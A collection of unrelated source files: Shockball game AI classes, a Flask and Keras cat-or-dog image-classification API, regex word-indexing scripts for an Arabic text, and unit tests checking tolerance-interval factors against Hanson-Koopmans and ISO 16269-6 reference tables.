if 2 not in my_team_numbers or len(my_team_numbers) == 1:
self.actions[1] = self.mode_solo
self.actions[2] = self.mode_solo
self.actions[3] = self.mode_solo
return ActionAIFramework.Update(self, ai_input)
def Action_Dodge(self, player, instructions, ai_input):
ball = self.GetClosestInFlightThrownBall(player, ai_input)
if ball:
ball_to_player = player.position - ball.position
distance = ball_to_player.length
if distance < 40 and self.IsBallGoingToward(ball, player.position):
instructions.move_target = player.position + ball_to_player
return True
return False
def Action_GetFieldBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos if abs(ball.position.y - self.player_starting_positions[player.number].y) >= ai_input.arena_size * self.base_field_percent])
if ball:
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_PassBallToTeammate(self, player, instructions, ai_input):
target = self.GetClosestTeamateWithoutBall(player, ai_input)
if player.has_ball and target:
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_passing = True
instructions.pass_target = target.position
return True
return False
def Action_StoreBallAtBase(self, player, instructions, ai_input):
if player.has_ball:
target = self.player_starting_positions[player.number]
instructions.move_target = target
distance_to_start = (player.position - target).length
if distance_to_start < ai_input.arena_size * self.base_field_percent:
instructions.is_passing = True
instructions.pass_power = 0.0
instructions.pass_target = target
return True
return False
def Action_CircleStart(self, player, instructions, ai_input):
frequency = 10.0
t = self.updates / frequency
x_offset = math.sin(t / 2 * math.pi) * 10
y_offset = math.cos(t / 2 * math.pi) * 10
instructions.move_target = vector.Vector(self.player_starting_positions[player.number].x, self.player_starting_positions[player.number].y)
if instructions.move_target.y == 0.0:
instructions.move_target.y += ai_input.arena_size * self.base_field_percent
else:
instructions.move_target.y -= ai_input.arena_size * self.base_field_percent
instructions.move_target.x += x_offset
instructions.move_target.y += y_offset
return True
def Action_CatchPass(self, player, instructions, ai_input):
if ai_input.in_flight_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw == False])
if ball:
distance = (ball.position - player.position).length
ball_to_player = player.position - ball.position
angel_of_approach = ball_to_player * ball.velocity
if distance < 20.0 and angel_of_approach > .5:
instructions.move_target = ball.position
return True
return False
def Action_ThrowAtNearbyOpponent(self, player, instructions, ai_input):
target = self.GetClosestAttackableOpponent(player, ai_input)
if player.has_ball and target:
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
def Action_GetClosestBall(self, player, instructions, ai_input):
if ai_input.grounded_ball_infos and not player.has_ball:
ball = self.GetClosestObject(player.position, [ball for ball in ai_input.grounded_ball_infos])
distance = (ball.position - player.position).length
if distance < 2.0:
instructions.is_picking = True
else:
instructions.move_target = ball.position
return True
return False
def Action_AttackClosestOpponent(self, player, instructions, ai_input):
target = self.GetClosestAttackableOpponent(player, ai_input)
if player.has_ball and target:
instructions.move_target = target.position
distance = (target.position - player.position).length
if distance < 8 * player.throw:
instructions.is_throwing = True
instructions.throw_target = target.position
return True
return False
def SetupStartingPositionsOnFirstUpdate(self, ai_input):
if len(self.player_starting_positions) == 0:
for player in ai_input.player_infos:
self.player_starting_positions[player.number] = player.position
```
#### File: Shockball/Team/KaliAI1.py
```python
from AI import AI
from AI import PlayerUpdateInstructions
from AI import AIOutput
import vector
from Frameworks.CommonQueryAIFramework import CommonQueryAIFramework
from Frameworks.ActionAIFramework import ActionAIFramework
@AI.Team
class KaliAI1(CommonQueryAIFramework, ActionAIFramework):
def __init__(self):
ActionAIFramework.__init__(self)
self.strategy = [ self.Action_DodgeGoose,
self.Action_GetTheFOutOfTheWay,
self.Action_GetClosestBall,
self.Action_GetBallToTargetPlayer,
]
self.actions[1] = self.strategy
self.actions[2] = self.strategy
self.actions[3] = self.strategy
def Action_DodgeGoose(self, player, ins, ai_input):
ball = self.GetClosestInFlightThrownBall(player, ai_input)
if ball:
ball_to_player = (player.position - ball.position)
ball_to_player.normalize()
bv = vector.Vector(x=ball.velocity.x, y=ball.velocity.y)
bv.normalize()
incoming = ball_to_player * bv
if incoming > 0.75 and self.Distance(player, ball) < 31:
ins.move_target = ((player.position - ball.position) + player.position)
ins.is_moving = True
return True
return False
def Action_GetBallToTargetPlayer(self, player, ins, ai_input):
targetable_players = self.GetTargetablePlayers(ai_input, player)
targeted_player = self.GetClosestOfPositionalObjects(player, targetable_players)
if targeted_player != None:
throwing_distance = player.throw * 10
if (targeted_player.position - player.position).length > throwing_distance:
ins.is_moving = True
ins.move_target = targeted_player.position
return True
elif targeted_player.team == player.team:
ins.is_passing = True
ins.pass_target = targeted_player.position
return True
else:
ins.is_throwing = True
ins.throw_target = targeted_player.position
return True
return False
def Action_GetClosestBall(self, player, ins, ai_input):
if not player.has_ball:
closest_ball = self.GetClosestOfPositionalObjects(player, ai_input.grounded_ball_infos + [ball for ball in ai_input.in_flight_ball_infos if ball.is_throw == False])
if closest_ball == None:
return False # GivePlayerSomethingToDoIfNoBallsAvailable
if (closest_ball.position - player.position).length < 2:
ins.is_picking = True
return True
else:
ins.is_moving = True
ins.move_target = closest_ball.position
return True
return False
def Action_GetTheFOutOfTheWay(self, player, ins, ai_input):
teammates = self.GetTeammates(ai_input)
for teammate in teammates:
if teammate.number == player.number:
continue
else:
if self.Distance(teammate, player) < 1.6 and player.number < teammate.number:
ins.is_moving = True
ins.move_target = ((player.position - teammate.position) + player.position) #I Totally Know It Is Equivelant To 2x - y, But Reasons.
return True
return False
def GetTargetablePlayers(self, ai_input, player):
kill = self.GetClosestAttackableOpponent(player, ai_input)
if kill:
kill_dst = self.Distance(player, kill)
if kill_dst <= player.throw * 10:
return [kill]
targetable_players = list()
for considered_player in ai_input.player_infos:
if considered_player.has_ball and considered_player.team == player.team:
continue
if considered_player.team != player.team:
targetable_players.append(considered_player)
continue
opponent_players = list()
for opponent in ai_input.player_infos:
if opponent.team != player.team:
opponent_players.append(opponent)
closest_opponent = self.GetClosestOfPositionalObjects(considered_player, opponent_players)
if closest_opponent == None:
continue
distance = (considered_player.position - closest_opponent.position).length
max_throwing_distance = considered_player.throw * 10
if distance <= max_throwing_distance:
targetable_players.append(considered_player)
return targetable_players
def GetClosestOfPositionalObjects(self, positional_object, positional_object_list):
if len(positional_object_list) == 0:
return None
closest_positional_object = positional_object_list[0]
closest_distance = (positional_object.position - positional_object_list[0].position).length
for considered_positional_object in positional_object_list:
distance = (positional_object.position - considered_positional_object.position).length
if distance < closest_distance:
closest_distance = distance
closest_positional_object = considered_positional_object
return closest_positional_object
```
|
{
"source": "jedkalita/Flask-API-pranjitkalita",
"score": 3
}
|
#### File: jedkalita/Flask-API-pranjitkalita/server.py
```python
from keras.models import load_model
from keras.applications import ResNet50
from keras.preprocessing.image import img_to_array
from keras.preprocessing import image
from keras.applications import imagenet_utils
from PIL import Image
import numpy as np
import flask
import io
app = flask.Flask(__name__) #initialize our Flask application
model = None #initialize the given cats and dogs keras model
model_resnet50 = None #initialize the ResNet50 keras model
def load_models():
# load the pre-trained Keras model (here we are using a model
# pre-trained on ImageNet and provided by Keras, but you can
# substitute in your own networks just as easily)
global model
global model_resnet50
# model = ResNet50(weights="imagenet")
model = load_model('cats_dogs_model.hdf5')
model_resnet50 = ResNet50(weights="imagenet")
#load the image from the file in target into (150x150x3) and create 4 dimensions in the format the model
#expects
def load_image(img_path, show=False):
img = image.load_img(img_path, target_size=(150, 150))
img_tensor = image.img_to_array(img) #(height, width, channels)
img_tensor = np.expand_dims(img_tensor, axis=0) #(1, height, width, channels)
# new dimension because the model expects 4 dimensions
img_tensor /= 255. #values in the range [0, 1]
return img_tensor
#preprocessing the image for ResNet50 model input (240x240x3)
def prepare_image(image, target):
# if the image mode is not RGB, convert it
if image.mode != "RGB":
image = image.convert("RGB")
# resize the input image and preprocess it
image = image.resize(target)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
image = imagenet_utils.preprocess_input(image)
# return the processed image
return image
#API endpoint - given an image, return a prediction whether it is a dog or cat - uses POST method
#returns a string indicating whether the predicted animal is a cat or a dog
@app.route("/predict_cat_or_dog", methods=["POST"])
def predict_cat_or_dog():
data = {"success": False}
if flask.request.method == "POST":
if flask.request.files.get("image"):
image = flask.request.files["image"]
new_image = load_image(image)
preds = model.predict(new_image)
data["predictions"] = [] #to jsonify
if preds > 0.5: #if it is closer to 1, then it is a dog
result = 'Dog'
else: #if it is closer to 0, then it is a cat
result = 'Cat'
return 'Predicted animal is: ' + result + '\n'
#API endpoint - given an image, return a prediction whether it is a dog or cat - uses POST method
#returns a JSON with name of predicted animal and probability (the value returned by the model)
@app.route("/predict_cat_or_dog_with_probability", methods=["POST"])
def predict_cat_or_dog_with_probability():
data = {"success": False}
if flask.request.method == "POST":
if flask.request.files.get("image"):
image = flask.request.files["image"]
new_image = load_image(image)
preds = model.predict(new_image)
data["predictions"] = [] #to jsonify
if preds > 0.5: #if it is closer to 1, then it is a dog
result = 'Dog'
else: #if it is closer to 0, then it is a cat
result = 'Cat'
data["success"] = True
r = {"animal": result, "probability": float(preds[0][0])}
data["predictions"].append(r)
return flask.jsonify(data)
#API endpoint - given an image, return a prediction whether it is a dog or cat - uses GET method
#same as above in structure and functionality. Just checking GET vs POST.
@app.route("/predict_cat_or_dog_with_probability_get", methods=["GET"])
def predict_cat_or_dog_with_probability_get():
data = {"success": False}
if flask.request.method == "GET":
if flask.request.files.get("image"):
image = flask.request.files["image"]
new_image = load_image(image)
preds = model.predict(new_image)
data["predictions"] = []
if preds > 0.5: #if it is closer to 1, then it is a dog
result = 'Dog'
else: #if it is closer to 0, then it is a cat
result = 'Cat'
data["success"] = True
r = {"animal": result, "probability": float(preds[0][0])}
data["predictions"].append(r)
return flask.jsonify(data)
#API endpoint - In this endpoint, we use the use a heuristic to calculate how sure we are if the
# prediction of the image is a dog or a cat. Then if we are more than 50% sure, then we display how
#confident we are. Otherwise, we call the ResNet50 model that has been trained on different varieties
#of objects to give the top predictions and return the statement.
@app.route("/predict_with_confidence", methods=["POST"])
def predict_with_confidence():
data = {"success": False}
if flask.request.method == "POST":
if flask.request.files.get("image"):
image = flask.request.files["image"]
image2 = flask.request.files["image"].read()
new_image = load_image(image)
preds = model.predict(new_image) #value returned by our pre-trained Keras model
data["predictions"] = []
if preds > 0.5:
result = 'Dog'
surity = (abs(0.5 - preds) * 2.0) * 100.0 #calculate how sure you are based on how far
#the prediction value is from 1
else:
result = 'Cat'
surity = (abs(0.5 - preds) * 2.0) * 100.0 #calculate how sure you are based on how far
#the prediction value is from 0
data["success"] = True
r = {"animal": result, "probability": float(preds[0][0])}
data["predictions"].append(r)
# return result + '\n'
if (surity < 50): #if low confidence, ie less than 50% confidence
statement = 'The animal is a ' + str(result) + ' with low confidence of ' + str(surity[0][0]) + '%.' + '\n'
#then use the ResNet50 model to give the top predictions for what the object could be
image2 = Image.open(io.BytesIO(image2)) #do the necessary preprocessing
image2 = prepare_image(image2, target=(224, 224)) #target size is (224x224x3)
predictions = model_resnet50.predict(image2) #call the ResNet50 model and get the predictions
results = imagenet_utils.decode_predictions(predictions)
statement = statement + 'It is mostly one of the following with probabilities...' + '\n'
for (imagenetID, label, prob) in results[0]:
statement = statement + str(label) + ':' + str(prob) + '\n'
else:
statement = 'The animal is a ' + str(result) + ' with high confidence of ' + str(surity[0][0]) + '%.' + '\n'
return statement
# load the models and start the server
if __name__ == "__main__":
print(("* Loading Keras model, ResNet50 model. Starting server.."
"Please wait until the server has started."))
load_models()
app.run(host='0.0.0.0')
```
|
{
"source": "jedlitools/find-for-me",
"score": 4
}
|
#### File: jedlitools/find-for-me/ex13_index_more_words.py
```python
import re
filename = 'baladhuri_futuh.txt'
text = open(filename, mode='r', encoding='utf-8').read()
def index_generator(word, text):
juz = 'الجزء:'
safha = 'الصفحة:'
page_regex = juz + r' \d+ ¦ ' + safha + r' \d+'
search_regex = word + r'.+?(' + page_regex + ')'
pagination = re.findall(search_regex, text, re.DOTALL)
return pagination
search_words = ['عيسابا']
for word in search_words:
index = index_generator(word, text)
print(word)
for page in index:
print(page)
```
#### File: jedlitools/find-for-me/ex18_prefixes_conjunctions.py
```python
import re
filename = 'baladhuri_futuh.txt'
text = open(filename, mode='r', encoding='utf-8').read()
def word_counter(search_word, search_text):
freq_word = len(re.findall(search_word, search_text))
freq_word = str(freq_word)
print(search_word + ' appears ' + freq_word + ' times in this text')
word = r"\bو?حكم\b"
word_counter(word, text)
```
|
{
"source": "jedludlow/tolerance_interval_py",
"score": 3
}
|
#### File: tolerance_interval_py/tests/test_oneside_hansonkoopmans.py
```python
import numpy as np
from toleranceinterval.oneside import hanson_koopmans
import unittest
class TestEverything(unittest.TestCase):
# Values from:
# <NAME>., & <NAME>. (1964). Tolerance Limits for
# the Class of Distributions with Increasing Hazard Rates. Ann. Math.
# Statist., 35(4), 1561-1570. https://doi.org/10.1214/aoms/1177700380
#
# data[:, [n, p, g, b]]
data = np.array([[2, 0.25, 0.9, 8.618],
[2, 0.25, 0.95, 17.80],
[2, 0.25, 0.99, 91.21],
[3, 0.25, 0.90, 5.898],
[3, 0.25, 0.95, 12.27],
[3, 0.25, 0.99, 63.17],
[4, 0.25, 0.90, 4.116],
[4, 0.25, 0.95, 8.638],
[4, 0.25, 0.99, 44.78],
[5, 0.25, 0.90, 2.898],
[5, 0.25, 0.95, 6.154],
[5, 0.25, 0.99, 32.17],
[6, 0.25, 0.90, 2.044],
[6, 0.25, 0.95, 4.411],
[6, 0.25, 0.99, 23.31],
[7, 0.25, 0.90, 1.437],
[7, 0.25, 0.95, 3.169],
[7, 0.25, 0.99, 16.98],
[8, 0.25, 0.90, 1.001],
[8, 0.25, 0.95, 2.275],
[8, 0.25, 0.99, 12.42],
[9, 0.25, 0.95, 1.627],
[9, 0.25, 0.99, 9.100],
[2, 0.10, 0.90, 17.09],
[2, 0.10, 0.95, 35.18],
[2, 0.10, 0.99, 179.8],
[3, 0.10, 0.90, 13.98],
[3, 0.10, 0.95, 28.82],
[3, 0.10, 0.99, 147.5],
[4, 0.10, 0.90, 11.70],
[4, 0.10, 0.95, 24.17],
[4, 0.10, 0.99, 123.9],
[5, 0.10, 0.90, 9.931],
[5, 0.10, 0.95, 20.57],
[5, 0.10, 0.99, 105.6],
[6, 0.10, 0.90, 8.512],
[6, 0.10, 0.95, 17.67],
[6, 0.10, 0.99, 90.90],
[7, 0.10, 0.90, 7.344],
[7, 0.10, 0.95, 15.29],
[7, 0.10, 0.99, 78.80],
[8, 0.10, 0.90, 6.368],
[8, 0.10, 0.95, 13.30],
[8, 0.10, 0.99, 68.68],
[9, 0.10, 0.90, 5.541],
[9, 0.10, 0.95, 11.61],
[9, 0.10, 0.99, 60.10],
[2, 0.05, 0.90, 23.65],
[2, 0.05, 0.95, 48.63],
[2, 0.05, 0.99, 248.4],
[3, 0.05, 0.90, 20.48],
[3, 0.05, 0.95, 42.15],
[3, 0.05, 0.99, 215.4],
[4, 0.05, 0.90, 18.12],
[4, 0.05, 0.95, 37.32],
[4, 0.05, 0.99, 190.9],
[5, 0.05, 0.90, 16.24],
[5, 0.05, 0.95, 33.49],
[5, 0.05, 0.99, 171.4],
[6, 0.05, 0.90, 14.70],
[6, 0.05, 0.95, 30.33],
[6, 0.05, 0.99, 155.4],
[7, 0.05, 0.90, 13.39],
[7, 0.05, 0.95, 27.66],
[7, 0.05, 0.99, 141.8],
[8, 0.05, 0.90, 12.26],
[8, 0.05, 0.95, 25.35],
[8, 0.05, 0.99, 130.0],
[9, 0.05, 0.90, 11.27],
[9, 0.05, 0.95, 23.33],
[9, 0.05, 0.99, 119.8],
[20, 0.05, 0.90, 5.077],
[20, 0.05, 0.95, 10.68],
[20, 0.05, 0.99, 55.47]])
def test_upper_table_bounds(self):
j = 1
for i, row in enumerate(self.data):
n = int(row[0])
p = 1.0-row[1]
g = row[2]
b = row[3]
x = np.random.random(n) + 1000.
x.sort()
bound = hanson_koopmans(x, p, g, j=1)[0]
b_ = (bound - x[n-j-1]) / (x[-1] - x[n-j-1])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_lower_table_bounds(self):
j = 1
for i, row in enumerate(self.data):
n = int(row[0])
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n) + 1000.
x.sort()
bound = hanson_koopmans(x, p, g, j=1)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_random_shapes(self):
M = [3, 10, 20]
N = [5, 10, 20]
J = [1, 2]
for m in M:
for n in N:
for j in J:
x = np.random.random((m, n))
bounds = hanson_koopmans(x, 0.1, 0.95, j=j)
_m = bounds.size
self.assertTrue(_m == m)
def test_value_error(self):
with self.assertRaises(ValueError):
x = np.random.random((1, 2, 4, 3))
hanson_koopmans(x, 0.1, 0.9)
def test_step_size(self):
i = 0
row = self.data[i]
n = int(row[0])
j = n-1
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g, step_size=1e-6)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_new_raphson(self):
i = 0
row = self.data[i]
n = int(row[0])
j = n-1
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g, method='newton-raphson')[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='newton-raphson',
max_iter=50)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='newton-raphson',
tol=1e-6)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_halley(self):
i = 0
row = self.data[i]
n = int(row[0])
j = n-1
p = row[1]
g = row[2]
b = row[3]
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g, method='halley')[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='halley', max_iter=50)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
bound = hanson_koopmans(x, p, g, method='halley', tol=1e-6)[0]
b_ = (x[j] - bound) / (x[j] - x[0])
self.assertTrue(np.isclose(b, b_, rtol=1e-3, atol=1e-4))
def test_fall_back(self):
p = 0.01
g = 0.95
n = 300
x = np.random.random(n)
x.sort()
bound = hanson_koopmans(x, p, g)[0]
self.assertTrue(np.isclose(bound, x[0]))
if __name__ == '__main__':
np.random.seed(121)
unittest.main()
```
#### File: tolerance_interval_py/tests/test_twoside_normal_factor_iso.py
```python
import numpy as np
import toleranceinterval.twoside as ts
import unittest
def decimal_ceil(x, places):
"""
Apply ceiling function at a decimal place.
The tables of tolerance factors in ISO 16269-6:2014 provide
the tolerance factors to a certain number of decimal places. The values
at that final decimal place reflect the application of the ceiling function
at that decimal place.
"""
x *= 10 ** places
x = np.ceil(x)
x /= 10 ** places
return x
class BaseTestIso:
class TestIsoTableF(unittest.TestCase):
def test_tolerance_factor(self):
for row_idx, row in enumerate(self.factor_k5):
for col_idx, k5 in enumerate(row):
k = ts.normal_factor(
self.sample_size[row_idx],
self.coverage,
self.confidence,
method='exact',
m=self.number_of_samples[col_idx])
k = decimal_ceil(k, places=4)
self.assertAlmostEqual(k, k5, places=4)
class TestIsoF1(BaseTestIso.TestIsoTableF):
coverage = 0.90
confidence = 0.90
# This is n from the table.
sample_size = np.array([
2, 8, 16, 35, 100, 300, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 2
15.5124, 6.0755, 4.5088, 3.8875, 3.5544,
3.3461, 3.2032, 3.0989, 3.0193, 2.9565,
# n = 8
2.7542, 2.3600, 2.2244, 2.1530, 2.1081,
2.0769, 2.0539, 2.0361, 2.0220, 2.0104,
# n = 16
2.2537, 2.0574, 1.9833, 1.9426, 1.9163,
1.8977, 1.8837, 1.8727, 1.8638, 1.8564,
# n = 35
1.9906, 1.8843, 1.8417, 1.8176, 1.8017,
1.7902, 1.7815, 1.7747, 1.7690, 1.7643,
# n = 100
1.8232, 1.7697, 1.7473, 1.7343, 1.7256,
1.7193, 1.7144, 1.7105, 1.7073, 1.7047,
# n = 300
1.7401, 1.7118, 1.6997, 1.6925, 1.6877,
1.6842, 1.6815, 1.6793, 1.6775, 1.6760,
# n = 1000
1.6947, 1.6800, 1.6736, 1.6698, 1.6672,
1.6653, 1.6639, 1.6627, 1.6617, 1.6609,
# n = infinity
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF2(BaseTestIso.TestIsoTableF):
coverage = 0.95
confidence = 0.90
# This is n from the table.
sample_size = np.array([
3, 9, 15, 30, 90, 150, 400, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 3
6.8233, 4.3320, 3.7087, 3.4207, 3.2528,
3.1420, 3.0630, 3.0038, 2.9575, 2.9205,
# n = 9
3.1323, 2.7216, 2.5773, 2.5006, 2.4521,
2.4182, 2.3931, 2.3737, 2.3581, 2.3454,
# n = 15
2.7196, 2.4718, 2.3789, 2.3280, 2.2951,
2.2719, 2.2545, 2.2408, 2.2298, 2.2206,
# n = 30
2.4166, 2.2749, 2.2187, 2.1870, 2.1662,
2.1513, 2.1399, 2.1309, 2.1236, 2.1175,
# n = 90
2.1862, 2.1182, 2.0898, 2.0733, 2.0624,
2.0544, 2.0482, 2.0433, 2.0393, 2.0360,
# n = 150
2.1276, 2.0775, 2.0563, 2.0439, 2.0356,
2.0296, 2.0249, 2.0212, 2.0181, 2.0155,
# n = 400
2.0569, 2.0282, 2.0158, 2.0085, 2.0035,
1.9999, 1.9971, 1.9949, 1.9930, 1.9915,
# n = 1000
2.0193, 2.0018, 1.9942, 1.9897, 1.9866,
1.9844, 1.9826, 1.9812, 1.9800, 1.9791,
# n = infinity
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF3(BaseTestIso.TestIsoTableF):
coverage = 0.99
confidence = 0.90
# This is n from the table.
sample_size = np.array([
4, 8, 17, 28, 100, 300, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 4
6.3722, 4.6643, 4.1701, 3.9277, 3.7814,
3.6825, 3.6108, 3.5562, 3.5131, 3.4782,
# n = 8
4.2707, 3.6541, 3.4408, 3.3281, 3.2572,
3.2078, 3.1712, 3.1428, 3.1202, 3.1016,
# n = 17
3.4741, 3.1819, 3.0708, 3.0095, 2.9698,
2.9416, 2.9204, 2.9037, 2.8902, 2.8791,
# n = 28
3.2023, 3.0062, 2.9286, 2.8850, 2.8564,
2.8358, 2.8203, 2.8080, 2.7980, 2.7896,
# n = 100
2.8548, 2.7710, 2.7358, 2.7155, 2.7018,
2.6919, 2.6843, 2.6782, 2.6732, 2.6690,
# n = 300
2.7249, 2.6806, 2.6616, 2.6504, 2.6429,
2.6374, 2.6331, 2.6297, 2.6269, 2.6245,
# n = 1000
2.6538, 2.6308, 2.6208, 2.6148, 2.6108,
2.6079, 2.6056, 2.6037, 2.6022, 2.6009,
# n = infinity
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF4(BaseTestIso.TestIsoTableF):
coverage = 0.90
confidence = 0.95
# This is n from the table.
sample_size = np.array([
2, 8, 16, 35, 150, 500, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 2
31.0923, 8.7252, 5.8380, 4.7912, 4.2571,
3.9341, 3.7179, 3.5630, 3.4468, 3.3565,
# n = 8
3.1561, 2.5818, 2.3937, 2.2974, 2.2381,
2.1978, 2.1685, 2.1463, 2.1289, 2.1149,
# n = 16
2.4486, 2.1771, 2.0777, 2.0241, 1.9899,
1.9661, 1.9483, 1.9346, 1.9237, 1.9147,
# n = 35
2.0943, 1.9515, 1.8953, 1.8638, 1.8432,
1.8285, 1.8174, 1.8087, 1.8016, 1.7957,
# n = 150
1.8260, 1.7710, 1.7478, 1.7344, 1.7254,
1.7188, 1.7137, 1.7097, 1.7064, 1.7036,
# n = 500
1.7374, 1.7098, 1.6979, 1.6908, 1.6861,
1.6826, 1.6799, 1.6777, 1.6760, 1.6744,
# n = 1000
1.7088, 1.6898, 1.6816, 1.6767, 1.6734,
1.6709, 1.6690, 1.6675, 1.6663, 1.6652,
# n = infinity
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF5(BaseTestIso.TestIsoTableF):
coverage = 0.95
confidence = 0.95
# This is n from the table.
sample_size = np.array([
5, 10, 26, 90, 200, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 5
5.0769, 3.6939, 3.2936, 3.0986, 2.9820,
2.9041, 2.8482, 2.8062, 2.7734, 2.7472,
# n = 10
3.3935, 2.8700, 2.6904, 2.5964, 2.5377,
2.4973, 2.4677, 2.4450, 2.4271, 2.4125,
# n = 26
2.6188, 2.4051, 2.3227, 2.2771, 2.2476,
2.2266, 2.2108, 2.1985, 2.1886, 2.1803,
# n = 90
2.2519, 2.1622, 2.1251, 2.1037, 2.0895,
2.0792, 2.0713, 2.0650, 2.0598, 2.0555,
# n = 200
2.1430, 2.0877, 2.0642, 2.0505, 2.0413,
2.0346, 2.0294, 2.0253, 2.0219, 2.0190,
# n = 1000
2.0362, 2.0135, 2.0037, 1.9979, 1.9939,
1.9910, 1.9888, 1.9870, 1.9855, 1.9842,
# n = infinity
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
1.9600, 1.9600, 1.9600, 1.9600, 1.9600,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF6(BaseTestIso.TestIsoTableF):
coverage = 0.99
confidence = 0.95
# This is n from the table.
sample_size = np.array([
3, 9, 17, 35, 100, 500, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 3
12.6472, 6.8474, 5.5623, 4.9943, 4.6711,
4.4612, 4.3133, 4.2032, 4.1180, 4.0500,
# n = 9
4.6329, 3.8544, 3.5909, 3.4534, 3.3677,
3.3085, 3.2651, 3.2317, 3.2052, 3.1837,
# n = 17
3.7606, 3.3572, 3.2077, 3.1264, 3.0743,
3.0377, 3.0104, 2.9892, 2.9722, 2.9582,
# n = 35
3.2762, 3.0522, 2.9638, 2.9143, 2.8818,
2.8586, 2.8411, 2.8273, 2.8161, 2.8068,
# n = 100
2.9356, 2.8253, 2.7794, 2.7529, 2.7352,
2.7224, 2.7126, 2.7048, 2.6984, 2.6930,
# n = 500
2.7208, 2.6775, 2.6588, 2.6478, 2.6403,
2.6349, 2.6307, 2.6273, 2.6245, 2.6221,
# n = infinity
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
2.5759, 2.5759, 2.5759, 2.5759, 2.5759,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF7(BaseTestIso.TestIsoTableF):
coverage = 0.90
confidence = 0.99
# This is n from the table.
sample_size = np.array([
4, 10, 22, 80, 200, 1000, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 4
9.4162, 4.9212, 3.9582, 3.5449, 3.3166,
3.1727, 3.0742, 3.0028, 2.9489, 2.9068,
# n = 10
3.6167, 2.8193, 2.5709, 2.4481, 2.3748,
2.3265, 2.2923, 2.2671, 2.2477, 2.2324,
# n = 22
2.5979, 2.2631, 2.1429, 2.0791, 2.0393,
2.0120, 1.9921, 1.9770, 1.9652, 1.9558,
# n = 80
2.0282, 1.9056, 1.8562, 1.8281, 1.8097,
1.7964, 1.7864, 1.7785, 1.7721, 1.7668,
# n = 200
1.8657, 1.7973, 1.7686, 1.7520, 1.7409,
1.7328, 1.7266, 1.7216, 1.7176, 1.7142,
# n = 1000
1.7359, 1.7086, 1.6967, 1.6897, 1.6850,
1.6815, 1.6788, 1.6767, 1.6749, 1.6734,
# n = infinity
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
1.6449, 1.6449, 1.6449, 1.6449, 1.6449,
])
factor_k5 = factor_k5.reshape(sample_size.size, number_of_samples.size)
class TestIsoF8(BaseTestIso.TestIsoTableF):
coverage = 0.95
confidence = 0.99
# This is n from the table.
sample_size = np.array([
2, 9, 17, 40, 150, 500, np.inf,
])
# This is m from the table.
number_of_samples = np.arange(1, 11)
factor_k5 = np.array([
# n = 2
182.7201, 23.1159, 11.9855, 8.7010, 7.1975,
6.3481, 5.8059, 5.4311, 5.1573, 4.9489,
# n = 9
4.5810, 3.4807, 3.1443, 2.9784, 2.8793,
2.8136, 2.7670, 2.7324, 2.7057, 2.6846,
# n = 17
